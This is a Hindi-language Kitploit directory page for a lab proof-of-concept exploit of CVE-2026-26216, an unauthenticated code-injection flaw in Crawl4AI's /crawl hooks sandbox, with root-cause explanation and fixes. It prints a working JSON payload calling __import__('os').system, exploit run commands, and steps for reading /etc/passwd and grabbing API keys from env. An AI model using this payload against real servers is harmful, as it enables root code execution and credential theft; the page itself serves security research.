Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EXPLOIT-CVE-2026-26216 | Kitploit
उपकरण/GitHubGitHub/joaovicdev/exploit-cve-2026-26216
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubjoaovicdev/exploit-cve-2026-26216

EXPLOIT-CVE-2026-26216

रिपॉजिटरी देखें
26 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-26216 — hooks के माध्यम से Crawl4AI अनऑथेंटिकेटेड RCE (GHSA-5882-5rx9-xgxp)

CVSS 10.0 · pre-auth RCE · CWE-94 (Code Injection) Crawl4AI (< 0.8.0) के Docker सर्वर पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन, POST /crawl एंडपॉइंट के hooks पैरामीटर का दुरुपयोग करते हुए। POST में एक एकल JSON कंटेनर के अंदर Python को रूट के रूप में निष्पादित करता है।

यह एक प्रयोगशाला PoC है, जो स्व-निहित और पुनरुत्पादनीय है, सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।


एक वाक्य में भेद्यता

POST /crawl एंडपॉइंट hooks.code.<evento> फ़ील्ड में मनमाना Python कोड स्वीकार करता है। यह कोड एक "घरेलू सैंडबॉक्स" — प्रतिबंधित builtins का शब्दकोश — के अंदर exec() के साथ निष्पादित होता है। लेकिन __import__ को allowlist में छोड़ दिया गया था, जो __import__('os').system(...) की अनुमति देता है और पूरे सैंडबॉक्स को विफल कर देता है।

root@kitploit:~
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created":
        "async def hook(page, context, **kwargs):\n    __import__('os').system('id')\n    return page"
    }
  }
}

चूंकि आधिकारिक डिप्लॉयमेंट डिफ़ॉल्ट रूप से JWT बंद करके चलता है और कंटेनर रूट के रूप में चलता है, इसलिए परिणाम प्री-ऑथेंटिकेशन रूट RCE है।

यह "AI टूल में घरेलू सैंडबॉक्स" के बारे में सही सबक क्यों है

सैंडबॉक्स काम करता हुआ प्रतीत होता है: open, eval, exec हटा दिए गए हैं, इसलिए एक भोला हमला (open('/etc/passwd')) अवरुद्ध हो जाता है। यह सुरक्षा की झूठी भावना पैदा करता है। लेकिन पूरी stdlib (os, subprocess, socket) को आयात करने के लिए केवल एक भूला हुआ खतरनाक builtin (__import__) पर्याप्त है, और allowlist सजावट बन जाती है। Builtins की allowlist एक सैंडबॉक्स नहीं है।


प्रोजेक्ट संरचना

root@kitploit:~
CVE-2026-26216/
├── README.md
├── docker-compose.yml         # sobe o servidor vulnerável
├── vulnerable-app/
│   ├── Dockerfile             # imagem que roda como root (igual à oficial)
│   ├── requirements.txt
│   ├── server.py              # FastAPI: POST /crawl sem auth
│   └── hook_manager.py        # o sandbox fraco (a linha vulnerável está aqui)
└── exploit/
    └── exploit.py             # exploit Python (só stdlib)

निष्ठा नोट। vulnerable-app/ Crawl4AI के भेद्य कोड पथ का एक संक्षिप्त पुनरुत्पादन है (Chromium/Playwright नहीं खोलता), ताकि PoC हल्का और 100% पुनरुत्पादनीय रहे। सैंडबॉक्स का व्यवहार और पेलोड की संरचना आधिकारिक advisory GHSA-5882-5rx9-xgxp को प्रतिबिंबित करती है। भेद्य पंक्ति vulnerable-app/hook_manager.py में चिह्नित है।


चलाने का तरीका

root@kitploit:~
# 1. sobe o alvo
docker compose up -d --build

# 2. demonstração completa
python3 exploit/exploit.py --target http://localhost:11235 --demo

# 3. comando arbitrário
python3 exploit/exploit.py --target http://localhost:11235 --cmd "id; hostname; env"

# 4. derruba
docker compose down -v

एक्सप्लॉइट क्या प्रदर्शित करता है

वहाँ से: आंतरिक नेटवर्क में पिवोट, क्लाउड क्रेडेंशियल्स की चोरी, पर्सिस्टेंस, आदि।


प्रभाव

  • गोपनीयता: OPENAI_API_KEY, आंतरिक टोकन और कंटेनर secrets की चोरी।
  • अखंडता: फ़ाइलों का लेखन/संशोधन, बैकडोर।
  • उपलब्धता: प्रक्रियाओं को kill करना, डेटा मिटाना।
  • पार्श्व (Lateral): कंटेनर के पास आमतौर पर आंतरिक नेटवर्क तक पहुंच होती है → पिवोट।

यह सब बिना प्रमाणीकरण के।


सुधार

Crawl4AI 0.8.0 में ठीक किया गया:

  • __import__ (और eval/exec/open) अनुमत builtins से हटाए गए।
  • Hooks डिफ़ॉल्ट रूप से अक्षम — CRAWL4AI_HOOKS_ENABLED=true के माध्यम से स्पष्ट opt-in।

सामान्य शमन उपाय:

  • crawl4ai >= 0.8.0 में अपडेट करें।
  • Crawl4AI सर्वर को कभी भी सीधे इंटरनेट पर एक्सपोज़ न करें; JWT सक्षम करें।
  • कंटेनर को रूट के रूप में न चलाएं; गैर-विशेषाधिकार प्राप्त उपयोगकर्ता और read-only FS का उपयोग करें।
  • "Builtins की allowlist" को वही मानें जो वह है: यह एक सैंडबॉक्स नहीं है। अविश्वसनीय कोड निष्पादित करने के लिए, वास्तविक अलगाव (gVisor, microVM, नेटवर्क/FS के बिना अलग प्रक्रिया, seccomp) का उपयोग करें।

संदर्भ

  • GitHub Advisory — GHSA-5882-5rx9-xgxp
  • GitHub Advisory Database
  • Corgea — CVE-2026-26216
  • GitLab Advisory Database
  • miggo.io — GHSA-5882-5rx9-xgxp

कानूनी अस्वीकरण

सामग्री अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें
#क्रियाप्रभाव
1open('/etc/passwd') सीधासैंडबॉक्स द्वारा अवरुद्ध (झूठी सुरक्षा)
2__import__('subprocess') + id/whoamiरूट के रूप में RCE
3शेल के माध्यम से cat /etc/passwdफ़ाइलों का मनमाना पठन
4env | grep KEYAPI keys / टोकन की एक्सफ़िलट्रेशन
5echo ... > /tmp/PWNEDफ़ाइलों का मनमाना लेखन